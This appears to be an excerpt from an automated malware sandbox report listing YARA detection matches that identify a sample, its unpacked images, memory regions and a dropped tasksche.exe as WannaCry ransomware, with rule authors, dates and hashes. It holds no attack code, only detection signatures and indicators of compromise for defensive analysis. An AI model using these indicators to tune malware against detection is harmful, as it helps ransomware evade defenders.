Source: Yara match	File source: 1.2.onq54JS79W.exe.1eb4104.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.onq54JS79W.exe.23d6948.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.onq54JS79W.exe.1eb00a4.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.319173208.000000000040F000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.314578330.000000000040F000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.579769953.000000000042E000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.313347058.000000000040F000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.579812599.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.314619123.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.313403334.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.319235199.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.580942218.00000000023D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.580444356.0000000001EB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: onq54JS79W.exe PID: 3644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: onq54JS79W.exe PID: 6948, type: MEMORYSTR
Source: Yara match	File source: C:\Windows\tasksche.exe, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: onq54JS79W.exe, type: SAMPLE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: onq54JS79W.exe, type: SAMPLE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (based on rule by US CERT)
Source: onq54JS79W.exe, type: SAMPLE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: onq54JS79W.exe, type: SAMPLE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.onq54JS79W.exe.1ea5084.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.onq54JS79W.exe.1ea5084.5.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.onq54JS79W.exe.23c78c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.onq54JS79W.exe.23c78c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.onq54JS79W.exe.1ed7128.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.onq54JS79W.exe.1ed7128.2.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.onq54JS79W.exe.1ed7128.2.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.onq54JS79W.exe.1eb4104.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.onq54JS79W.exe.1eb4104.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (based on rule by US CERT)
Source: 1.2.onq54JS79W.exe.1eb4104.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 0.2.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 0.2.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (based on rule by US CERT)
Source: 0.2.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 0.2.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.onq54JS79W.exe.23f996c.8.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.onq54JS79W.exe.23f996c.8.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.onq54JS79W.exe.23f996c.8.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 0.2.onq54JS79W.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 0.2.onq54JS79W.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 0.2.onq54JS79W.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.onq54JS79W.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.onq54JS79W.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.onq54JS79W.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.onq54JS79W.exe.23f996c.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.onq54JS79W.exe.23f996c.8.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.onq54JS79W.exe.23f996c.8.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.onq54JS79W.exe.23d6948.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.onq54JS79W.exe.23d6948.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (based on rule by US CERT)
Source: 1.2.onq54JS79W.exe.23d6948.6.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (based on rule by US CERT)
Source: 1.2.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 0.0.onq54JS79W.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 0.0.onq54JS79W.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 0.0.onq54JS79W.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.onq54JS79W.exe.23c78c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.onq54JS79W.exe.23c78c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (based on rule by US CERT)
Source: 1.2.onq54JS79W.exe.23c78c8.7.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.onq54JS79W.exe.1ea5084.5.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.onq54JS79W.exe.1ea5084.5.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (based on rule by US CERT)
Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.onq54JS79W.exe.1ea5084.5.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.onq54JS79W.exe.1ea5084.5.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.0.onq54JS79W.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.0.onq54JS79W.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.0.onq54JS79W.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.onq54JS79W.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.onq54JS79W.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.onq54JS79W.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 0.2.onq54JS79W.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 0.2.onq54JS79W.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 0.2.onq54JS79W.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 0.0.onq54JS79W.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 0.0.onq54JS79W.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.onq54JS79W.exe.1ed7128.2.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 0.0.onq54JS79W.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.onq54JS79W.exe.1ed7128.2.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.onq54JS79W.exe.1ed7128.2.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 0.0.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 0.0.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (based on rule by US CERT)
Source: 0.0.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 0.0.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.0.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.0.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (based on rule by US CERT)
Source: 1.0.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.0.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.onq54JS79W.exe.23d28e8.9.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.onq54JS79W.exe.23d28e8.9.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.0.onq54JS79W.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.0.onq54JS79W.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.0.onq54JS79W.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.onq54JS79W.exe.1eb4104.3.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.onq54JS79W.exe.1eb4104.3.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.onq54JS79W.exe.23d6948.6.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.onq54JS79W.exe.23d6948.6.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.onq54JS79W.exe.1eb00a4.4.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.onq54JS79W.exe.1eb00a4.4.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000002.00000000.316611005.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000001.00000002.579812599.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000001.00000000.314619123.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000000.00000000.313403334.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000000.00000002.319235199.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000001.00000002.580942218.00000000023D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000001.00000002.580444356.0000000001EB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: C:\Windows\tasksche.exe, type: DROPPED	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: C:\Windows\tasksche.exe, type: DROPPED	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: C:\Windows\tasksche.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs

Source: onq54JS79W.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: onq54JS79W.exe, type: SAMPLE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: onq54JS79W.exe, type: SAMPLE	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (Nextron Systems) (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: onq54JS79W.exe, type: SAMPLE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: onq54JS79W.exe, type: SAMPLE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.onq54JS79W.exe.23d28e8.9.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Imphash_Mar23_2 date = 2023-03-23, author = Arnim Rupp (https://github.com/ruppde), description = Detects imphash often found in malware samples (Zero hits with with search for \'imphash:x p:0\' on Virustotal), score = 12bf2795f4a140adbaa0af6ad4b2508d398d8ba69e9dadb155f800b10f7458c4, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License, hash = 5b9348c24ff604e78d70464654e645b90dc695c7e0415959c443fe29cebc3c4e
Source: 1.2.onq54JS79W.exe.1ea5084.5.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.onq54JS79W.exe.1ea5084.5.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.onq54JS79W.exe.23c78c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.onq54JS79W.exe.23c78c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.onq54JS79W.exe.1eb00a4.4.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Imphash_Mar23_2 date = 2023-03-23, author = Arnim Rupp (https://github.com/ruppde), description = Detects imphash often found in malware samples (Zero hits with with search for \'imphash:x p:0\' on Virustotal), score = 12bf2795f4a140adbaa0af6ad4b2508d398d8ba69e9dadb155f800b10f7458c4, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License, hash = 5b9348c24ff604e78d70464654e645b90dc695c7e0415959c443fe29cebc3c4e
Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.onq54JS79W.exe.1ed7128.2.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.onq54JS79W.exe.1ed7128.2.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.onq54JS79W.exe.1ed7128.2.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.onq54JS79W.exe.1eb4104.3.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.onq54JS79W.exe.1eb4104.3.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (Nextron Systems) (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 1.2.onq54JS79W.exe.1eb4104.3.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0.2.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 0.2.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (Nextron Systems) (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 0.2.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0.2.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.onq54JS79W.exe.23f996c.8.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.onq54JS79W.exe.23f996c.8.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.onq54JS79W.exe.23f996c.8.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.2.onq54JS79W.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 0.2.onq54JS79W.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0.2.onq54JS79W.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.onq54JS79W.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.onq54JS79W.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.onq54JS79W.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.onq54JS79W.exe.23f996c.8.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.onq54JS79W.exe.23f996c.8.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.onq54JS79W.exe.23f996c.8.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
